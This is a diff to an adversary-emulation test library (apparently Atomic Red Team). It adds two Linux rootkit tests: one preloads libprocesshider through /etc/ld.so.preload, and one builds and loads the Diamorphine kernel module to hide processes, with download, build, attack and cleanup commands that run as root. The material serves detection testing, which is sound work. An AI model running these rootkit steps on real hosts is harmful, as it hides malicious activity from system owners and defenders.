diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7531aedb..7aaf6560 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -28,6 +28,8 @@ defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a0170a84..a2b5299d 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -14,6 +14,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 82abbff6..1f4ad974 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -43,6 +43,8 @@
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 4e1e11eb..578a51fb 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -22,6 +22,8 @@
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+ - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+ - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 13a32253..375ad111 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1712,6 +1712,104 @@ defense-evasion:
sudo depmod -a
name: sh
elevation_required: true
+ - name: dynamic-linker based rootkit (libprocesshider)
+ auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+ description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
+ specific process name via ls.so.preload (see also T1574.006).
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the github repo zip
+ type: String
+ default: https://github.com/gianlucaborello/libprocesshider/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
+ library_path:
+ description: Full path of the library to add to ld.so.preload
+ type: String
+ default: "/usr/local/lib/libprocesshider.so"
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The preload library must exist on disk at specified location
+ (#{library_path})
+
+ '
+ prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+ make
+ cp libprocesshider.so #{library_path}
+ cp /usr/bin/ping /usr/local/bin/evil_script.py
+ executor:
+ command: |
+ echo #{library_path} | tee -a /etc/ld.so.preload
+ /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+ cleanup_command: |
+ sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+ rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+ name: sh
+ elevation_required: true
+ - name: Loadable Kernel Module based Rootkit (Diamorphine)
+ auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
+ description: 'Loads Diamorphine kernel module, which hides itself and a processes.
+
+ '
+ supported_platforms:
+ - linux
+ input_arguments:
+ repo:
+ description: Url of the diamorphine github repo
+ type: String
+ default: https://github.com/m0nad/Diamorphine/
+ rev:
+ description: Revision of the github repo zip
+ type: String
+ default: 898810523aa2033f582a4a5903ffe453334044f9
+ rootkit_path:
+ description: Path To rootkit
+ type: String
+ default: "/tmp/atomic/Diamorphine"
+ rootkit_name:
+ description: Module name
+ type: String
+ default: diamorphine
+ dependency_executor_name: bash
+ dependencies:
+ - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+
+ '
+ prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
+ exit 0; else exit 1; fi;
+
+ '
+ get_prereq_command: |
+ mkdir -p /tmp/atomic && cd /tmp/atomic
+ curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+ make
+ sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+ sudo depmod -a
+ executor:
+ command: |
+ sudo modprobe #{rootkit_name}
+ ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ ps $TARGETPID
+ kill -31 $TARGETPID
+ ps $TARGETPID || echo "process ${TARGETPID} hidden"
+ cleanup_command: |
+ kill -63 1
+ sudo modprobe -r #{rootkit_name}
+ sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+ sudo depmod -a
+ name: sh
+ elevation_required: true
T1109:
technique:
x_mitre_platforms:
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
index 75bcea5a..f55e3b09 100644
--- a/atomics/T1014/T1014.md
+++ b/atomics/T1014/T1014.md
@@ -10,6 +10,10 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
- [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
+- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
+
+- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
+
@@ -129,4 +133,124 @@ sudo depmod -a
+
+
+
+## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
+Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/|
+| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
+| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+echo #{library_path} | tee -a /etc/ld.so.preload
+/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+```
+
+#### Cleanup Commands:
+```sh
+sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The preload library must exist on disk at specified location (#{library_path})
+##### Check Prereq Commands:
+```bash
+if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+make
+cp libprocesshider.so #{library_path}
+cp /usr/bin/ping /usr/local/bin/evil_script.py
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
+Loads Diamorphine kernel module, which hides itself and a processes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/|
+| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9|
+| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine|
+| rootkit_name | Module name | String | diamorphine|
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+sudo modprobe #{rootkit_name}
+ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ps $TARGETPID
+kill -31 $TARGETPID
+ps $TARGETPID || echo "process ${TARGETPID} hidden"
+```
+
+#### Cleanup Commands:
+```sh
+kill -63 1
+sudo modprobe -r #{rootkit_name}
+sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+sudo depmod -a
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+##### Check Prereq Commands:
+```bash
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+make
+sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+sudo depmod -a
+```
+
+
+
+